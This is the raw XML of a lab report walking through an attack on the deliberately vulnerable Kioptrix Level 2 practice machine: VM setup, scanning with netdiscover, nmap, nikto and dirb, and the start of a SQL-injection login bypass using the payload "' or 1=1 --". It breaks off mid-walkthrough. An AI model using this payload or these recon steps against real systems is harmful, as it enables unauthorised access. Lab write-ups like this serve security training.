        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003209DB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="003209DB" w:rsidRPr="00762605">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://download.vulnhub.com/kioptrix/Kioptrix_Level_2-update.rar</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003209DB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2B3DE8" w14:textId="6517EDE3" w:rsidR="003209DB" w:rsidRPr="002A04D8" w:rsidRDefault="003209DB" w:rsidP="003209DB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:pPr>
      <w:r w:rsidRPr="003209DB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="620E0D42" wp14:editId="4419A668">
            <wp:extent cx="5731510" cy="2698750"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="74447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70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EA16" w14:textId="7A5A84DA" w:rsidR="00BC6CF3" w:rsidRPr="002A04D8" w:rsidRDefault="00BC6CF3" w:rsidP="00C74136">
      <w:r w:rsidRPr="002A04D8">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Click on yellow colour highlighted link to download image of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. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2198B815" w14:textId="233BD690" w:rsidR="00AC5DB0" w:rsidRPr="002A04D8" w:rsidRDefault="00AC5DB0" w:rsidP="00C74136">
      <w:r w:rsidRPr="002A04D8">
        <w:t xml:space="preserve">After downloading we need to install the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 image on VMware workstation. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1358B318" w14:textId="0F07DDB6" w:rsidR="00AC5DB0" w:rsidRPr="002A04D8" w:rsidRDefault="00AC5DB0" w:rsidP="00C74136">
      <w:r w:rsidRPr="002A04D8">
        <w:t xml:space="preserve">After completing installation </w:t>
      </w:r>
      <w:r w:rsidR="00B5257D" w:rsidRPr="002A04D8">
        <w:t>next,</w:t>
      </w:r>
      <w:r w:rsidRPr="002A04D8">
        <w:t xml:space="preserve"> we need to put both Kali and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 on same network, to perform that we will need to put the network adaptor to bridge of both the machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155E337A" w14:textId="1545859A" w:rsidR="00AC5DB0" w:rsidRPr="002A04D8" w:rsidRDefault="00AC5DB0" w:rsidP="00C74136">
      <w:r w:rsidRPr="002A04D8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2723296E" wp14:editId="76EDABA1">
            <wp:extent cx="5731510" cy="3582035"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="126397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72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555E" w14:textId="13ADCE20" w:rsidR="00EE5320" w:rsidRPr="002A04D8" w:rsidRDefault="00EE5320" w:rsidP="00C74136">
      <w:r w:rsidRPr="002A04D8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DC95C99" wp14:editId="1A046B4A">
            <wp:extent cx="5731510" cy="3582035"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="95185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8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10D9" w14:textId="683938C4" w:rsidR="00AC5DB0" w:rsidRPr="002A04D8" w:rsidRDefault="00AC5DB0" w:rsidP="00C74136">
      <w:r w:rsidRPr="002A04D8">
        <w:t xml:space="preserve">Click on Network Adaptor and select </w:t>
      </w:r>
      <w:r w:rsidR="00EE5320" w:rsidRPr="002A04D8">
        <w:t xml:space="preserve">network connection type as Bridged, same task we need to do with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="00EE5320" w:rsidRPr="002A04D8">
        <w:t xml:space="preserve"> machine i.e., installed on VMware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBD5532" w14:textId="127298AD" w:rsidR="00EE5320" w:rsidRPr="002A04D8" w:rsidRDefault="00EE5320" w:rsidP="00C74136">
      <w:r w:rsidRPr="002A04D8">
        <w:lastRenderedPageBreak/>
        <w:t>After this we just need to power on both the machines and ready to start performing the task of ethical hacking in procedure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67551C99" w14:textId="6033B20D" w:rsidR="00EE5320" w:rsidRPr="002A04D8" w:rsidRDefault="00EE5320" w:rsidP="00C74136">
      <w:r w:rsidRPr="002A04D8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A4292D0" wp14:editId="3FAC629F">
            <wp:extent cx="5731510" cy="2960370"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="136368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B2B0" w14:textId="1AC99188" w:rsidR="00EE5320" w:rsidRDefault="00EE5320" w:rsidP="00C74136">
      <w:r w:rsidRPr="002A04D8">
        <w:t xml:space="preserve">Click on the yellow highlighted button to power on the Kali Linux machine on VMware and same action we need to perform on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 Machine as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8C7BC6" w14:textId="0BC0EAA0" w:rsidR="00BB02DE" w:rsidRDefault="00037DD5" w:rsidP="00C74136">
      <w:r w:rsidRPr="00037DD5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33ECC3A3" wp14:editId="68A1B5C8">
            <wp:extent cx="5365750" cy="3101823"/>
            <wp:effectExtent l="0" t="0" r="6350" b="3810"/>
            <wp:docPr id="65974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42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188" cy="31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6009" w14:textId="6704C690" w:rsidR="00BB02DE" w:rsidRDefault="00BB02DE" w:rsidP="00C74136">
      <w:r>
        <w:t xml:space="preserve">Screenshot of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00561A40">
        <w:t>Kioptrix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00561A40">
        <w:t xml:space="preserve"> Level 2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> login screen. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A0FB49" w14:textId="77777777" w:rsidR="00585505" w:rsidRDefault="00585505" w:rsidP="00174DAC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BBCECFA" w14:textId="77777777" w:rsidR="004561F3" w:rsidRDefault="004561F3" w:rsidP="00174DAC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58D8ECD5" w14:textId="77777777" w:rsidR="004561F3" w:rsidRDefault="004561F3" w:rsidP="004561F3"/>
    <w:p w14:paraId="20880074" w14:textId="77777777" w:rsidR="004561F3" w:rsidRDefault="004561F3" w:rsidP="004561F3"/>
    <w:p w14:paraId="5EE400F9" w14:textId="77777777" w:rsidR="004561F3" w:rsidRDefault="004561F3" w:rsidP="004561F3"/>
    <w:p w14:paraId="47D2E644" w14:textId="77777777" w:rsidR="004561F3" w:rsidRDefault="004561F3" w:rsidP="004561F3"/>
    <w:p w14:paraId="2DDF7DF0" w14:textId="3A9E9EBF" w:rsidR="00AC5DB0" w:rsidRPr="00B2627E" w:rsidRDefault="00B066B9" w:rsidP="00174DAC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc149067741"/>
      <w:r w:rsidRPr="00B2627E">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.0 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00561A40" w:rsidRPr="00B2627E">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Kioptrix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00561A40" w:rsidRPr="00B2627E">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Level 2</w:t>
      </w:r>
      <w:r w:rsidR="008E0CB7" w:rsidRPr="00B2627E">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Short Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="73A841CB" w14:textId="306C1DD1" w:rsidR="00AF22C4" w:rsidRPr="002A04D8" w:rsidRDefault="00AF22C4" w:rsidP="00AF22C4">
      <w:r w:rsidRPr="002A04D8">
        <w:t xml:space="preserve">Target IP: </w:t>
      </w:r>
      <w:r w:rsidR="00A91C09" w:rsidRPr="002A04D8">
        <w:t>192.168.1</w:t>
      </w:r>
      <w:r w:rsidR="00037DD5">
        <w:t>.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F104D4" w14:textId="33854DA3" w:rsidR="00AF22C4" w:rsidRPr="002A04D8" w:rsidRDefault="00AF22C4" w:rsidP="00AF22C4">
      <w:r w:rsidRPr="002A04D8">
        <w:t xml:space="preserve">Target Machine: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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71530B0F" w14:textId="319C97E0" w:rsidR="00AF22C4" w:rsidRPr="002A04D8" w:rsidRDefault="00AF22C4" w:rsidP="00AF22C4">
      <w:r w:rsidRPr="002A04D8">
        <w:t xml:space="preserve">Vulnerability Name: </w:t>
      </w:r>
      <w:r w:rsidR="00336EB6">
        <w:t>SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DC3AAF" w14:textId="74453682" w:rsidR="00AF22C4" w:rsidRPr="002A04D8" w:rsidRDefault="00AF22C4" w:rsidP="00AF22C4">
      <w:r w:rsidRPr="002A04D8">
        <w:t xml:space="preserve">Vulnerability Exploited: </w:t>
      </w:r>
      <w:r w:rsidR="00583185">
        <w:t>linux_x86/local/9542.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C40558" w14:textId="794399AE" w:rsidR="00AF22C4" w:rsidRPr="002A04D8" w:rsidRDefault="00AF22C4" w:rsidP="00AF22C4">
      <w:r w:rsidRPr="002A04D8">
        <w:t xml:space="preserve">Vulnerability Exploited With: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00336EB6">
        <w:t>apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00336EB6">
        <w:t xml:space="preserve"> web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37819019" w14:textId="3EC0AC00" w:rsidR="00AC5DB0" w:rsidRPr="002A04D8" w:rsidRDefault="00AF22C4" w:rsidP="00AF22C4">
      <w:r w:rsidRPr="002A04D8">
        <w:t xml:space="preserve">Payload Used: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2058FE00" w14:textId="4CEEB590" w:rsidR="008E0CB7" w:rsidRPr="00B2627E" w:rsidRDefault="00B066B9" w:rsidP="00174DAC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc149067742"/>
      <w:r w:rsidRPr="00B2627E">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.0 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00561A40" w:rsidRPr="00B2627E">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Kioptrix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00561A40" w:rsidRPr="00B2627E">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Level 2</w:t>
      </w:r>
      <w:r w:rsidR="008E0CB7" w:rsidRPr="00B2627E">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Methodology</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidR="008E0CB7" w:rsidRPr="00B2627E">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E954A5" w14:textId="559CA061" w:rsidR="00537362" w:rsidRPr="002A04D8" w:rsidRDefault="00561A40" w:rsidP="008E0CB7">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Kioptrix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Level 2</w:t>
      </w:r>
      <w:r w:rsidR="00537362" w:rsidRPr="002A04D8">
        <w:t xml:space="preserve"> machine that runs on </w:t>
      </w:r>
      <w:r w:rsidR="008877EA" w:rsidRPr="002A04D8">
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00537362" w:rsidRPr="002A04D8">
        <w:t xml:space="preserve">inux based </w:t>
      </w:r>
      <w:r w:rsidR="004561F3">
        <w:t>machine</w:t>
      </w:r>
      <w:r w:rsidR="00537362" w:rsidRPr="002A04D8">
        <w:t xml:space="preserve"> developed for ethical hackers to practices tricks and techniques of Penetration testing. This machine has a lot of vulnerabilities present that involve many well know open port no. We will check by which method we can exploit the into the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718D571F" w14:textId="70009C47" w:rsidR="008E0CB7" w:rsidRPr="002A04D8" w:rsidRDefault="008877EA" w:rsidP="008E0CB7">
      <w:r w:rsidRPr="002A04D8">
        <w:t>We will use Kali Linux as attacker machine</w:t>
      </w:r>
      <w:r w:rsidR="00583185">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00583185">
        <w:t>Kioptrix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00583185">
        <w:t xml:space="preserve"> Level 2 as target machine. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151C88CF" w14:textId="3DA37563" w:rsidR="00B066B9" w:rsidRDefault="008877EA" w:rsidP="00B066B9">
      <w:r w:rsidRPr="002A04D8">
        <w:t xml:space="preserve">First step to proceed Pen testing is information gathering and scanning, so now just boot both the machines Kali Linux and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 that are mounted on VMware. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA0B8DF" w14:textId="77777777" w:rsidR="007463D4" w:rsidRDefault="007463D4" w:rsidP="007463D4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0809CFDF" w14:textId="6EDD95A4" w:rsidR="00B066B9" w:rsidRPr="00B2627E" w:rsidRDefault="00B066B9" w:rsidP="007463D4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc149067743"/>
      <w:r w:rsidRPr="00B2627E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00561A40" w:rsidRPr="00B2627E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Kioptrix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00561A40" w:rsidRPr="00B2627E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Level 2</w:t>
      </w:r>
      <w:r w:rsidR="008877EA" w:rsidRPr="00B2627E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Information Gathering and Scanning</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidRPr="00B2627E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B305F57" w14:textId="39136CEE" w:rsidR="008877EA" w:rsidRPr="002A04D8" w:rsidRDefault="008877EA" w:rsidP="007463D4">
      <w:r w:rsidRPr="002A04D8">
        <w:t>We first need to see our IP assigned to both the s</w:t>
      </w:r>
      <w:r w:rsidR="000E7F21" w:rsidRPr="002A04D8">
        <w:t>ystems, to check that we will first have to open terminal by Ctrl + Alt +T. Now write the command “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000E7F21" w:rsidRPr="002A04D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000E7F21" w:rsidRPr="002A04D8">
        <w:t>” to check IP address assigned to the interface of attacker machine means our machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DBA402" w14:textId="286F26D5" w:rsidR="00646893" w:rsidRPr="002A04D8" w:rsidRDefault="00646893" w:rsidP="008877EA">
      <w:r w:rsidRPr="002A04D8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B318FFF" wp14:editId="19EEA752">
            <wp:extent cx="5396865" cy="2787650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22696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63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364" cy="2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352" w14:textId="3403898A" w:rsidR="000E7F21" w:rsidRPr="002A04D8" w:rsidRDefault="00646893" w:rsidP="008877EA">
      <w:r w:rsidRPr="002A04D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E62ABE" wp14:editId="3DD7065B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2406774" cy="628682"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="7805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64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4D8">
        <w:t xml:space="preserve">Now to check IP address of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 we will need to use “</w:t>
      </w:r>
      <w:r w:rsidRPr="002A04D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>netdiscover</w:t>
      </w:r>
      <w:r w:rsidRPr="002A04D8">
        <w:t>” command on Lin</w:t>
      </w:r>
      <w:r w:rsidR="00B47B9E" w:rsidRPr="002A04D8">
        <w:t xml:space="preserve">ux terminal to scan IP address in subnet range. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB8D596" w14:textId="38C2975C" w:rsidR="008877EA" w:rsidRPr="002A04D8" w:rsidRDefault="008877EA" w:rsidP="008877EA"/>
    <w:p w14:paraId="4B731F6D" w14:textId="77777777" w:rsidR="00673314" w:rsidRDefault="00673314" w:rsidP="008877EA"/>
    <w:p w14:paraId="6603B85D" w14:textId="0E61CE64" w:rsidR="00673314" w:rsidRDefault="00037DD5" w:rsidP="008877EA">
      <w:r w:rsidRPr="00037DD5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5937867A" wp14:editId="79E60032">
            <wp:extent cx="5731510" cy="1393190"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="20237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1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53F4" w14:textId="1F752B95" w:rsidR="00B47B9E" w:rsidRPr="002A04D8" w:rsidRDefault="00B47B9E" w:rsidP="008877EA">
      <w:r w:rsidRPr="002A04D8">
        <w:t xml:space="preserve">Since we have target machine mounted on VMware that’s why we can understand that IP address </w:t>
      </w:r>
      <w:r w:rsidRPr="004D3C03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>192.168.1.</w:t>
      </w:r>
      <w:r w:rsidR="00BF65A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="002A04D8">
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00561A40">
        <w:t>Kioptrix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00561A40">
        <w:t xml:space="preserve"> Level 2</w:t>
      </w:r>
      <w:r w:rsidRPr="002A04D8">
        <w:t xml:space="preserve"> Machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF425BD" w14:textId="5F76BA0C" w:rsidR="00B47B9E" w:rsidRPr="00295496" w:rsidRDefault="00B47B9E" w:rsidP="008877EA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A04D8">
        <w:t xml:space="preserve">Next, we need to scan IP address </w:t>
      </w:r>
      <w:r w:rsidR="00BF65A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>192.168.1.2</w:t>
      </w:r>
      <w:r w:rsidRPr="002A04D8">
        <w:t xml:space="preserve"> to check for open ports and Vulnerabilities, to perform this task we will need to run “</w:t>
      </w:r>
      <w:r w:rsidRPr="002A04D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="002A04D8">
        <w:t>” on Terminal.</w:t>
      </w:r>
      <w:r w:rsidR="00295496">
        <w:t xml:space="preserve"> Command used “</w:t>
      </w:r>
      <w:r w:rsidR="00295496" w:rsidRPr="00295496">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nmap -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00295496" w:rsidRPr="00295496">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00295496" w:rsidRPr="00295496">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -O -v -P -A </w:t>
      </w:r>
      <w:r w:rsidR="00BF65A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>192.168.1.2</w:t>
      </w:r>
      <w:r w:rsidR="00295496" w:rsidRPr="00295496">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFBB9A8" w14:textId="384243EF" w:rsidR="003F0C62" w:rsidRDefault="00BF65A4" w:rsidP="008877EA">
      <w:r w:rsidRPr="00BF65A4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6134F706" wp14:editId="1D4E9A18">
            <wp:extent cx="5731510" cy="2474595"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="172804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468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8A47" w14:textId="0678B890" w:rsidR="00FB6546" w:rsidRDefault="00FB6546" w:rsidP="008877EA">
      <w:r>
        <w:t>Next, we need to run</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6546">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> nikto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E66FC9" w14:textId="545F3653" w:rsidR="00FB6546" w:rsidRDefault="00FB6546" w:rsidP="008877EA">
      <w:r w:rsidRPr="00FB6546">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63B3E67E" wp14:editId="69591596">
            <wp:extent cx="5731510" cy="3048000"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2060766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662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587" w14:textId="77777777" w:rsidR="00F0581B" w:rsidRPr="002A04D8" w:rsidRDefault="00F0581B" w:rsidP="00F0581B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Nikto scan is giving detail information about web server running on port 80.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482FEDD8" w14:textId="38B5972F" w:rsidR="00FB6546" w:rsidRDefault="00F0581B" w:rsidP="008877EA">
      <w:r>
        <w:t xml:space="preserve">Next, we need to use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F0581B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for brute force to get additional information about web server directory </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36151BA3" w14:textId="30FD49F9" w:rsidR="00487E91" w:rsidRDefault="000F73F8" w:rsidP="008877EA">
      <w:r w:rsidRPr="000F73F8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="000BA6E9" wp14:editId="44D02FBB">
            <wp:extent cx="5708650" cy="7368434"/>
            <wp:effectExtent l="0" t="0" r="6350" b="4445"/>
            <wp:docPr id="81815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578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8626" cy="73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B6F" w14:textId="42F54983" w:rsidR="00083BAD" w:rsidRDefault="00083BAD" w:rsidP="008877EA">
      <w:r>
        <w:t xml:space="preserve">Next, we will use </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidRPr="00762605">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.1.2/index.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> for further use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B580A5B" w14:textId="77777777" w:rsidR="0001238C" w:rsidRDefault="00083BAD" w:rsidP="008877EA">
      <w:r>
        <w:t xml:space="preserve">We need to paste this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firefox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> browser of Attacker for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> injection</w:t>
      </w:r>
      <w:r w:rsidR="0001238C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119BFF04" w14:textId="6FA0D5D8" w:rsidR="000F73F8" w:rsidRDefault="0001238C" w:rsidP="008877EA">
      <w:r w:rsidRPr="0001238C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0838A440" wp14:editId="209F7322">
            <wp:extent cx="5731510" cy="1146175"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="90043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384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F539" w14:textId="44CBC213" w:rsidR="0001238C" w:rsidRDefault="0001238C" w:rsidP="008877EA">
      <w:r>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> injection using </w:t>
      </w:r>
      <w:r w:rsidR="00081B23">
        <w:t>login bypass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> enter </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0001238C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>‘ or</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0001238C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1=1 –</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in username and password </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF0E664" w14:textId="5D7FA15C" w:rsidR="0001238C" w:rsidRDefault="0001238C" w:rsidP="008877EA">
      <w:r w:rsidRPr="0001238C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
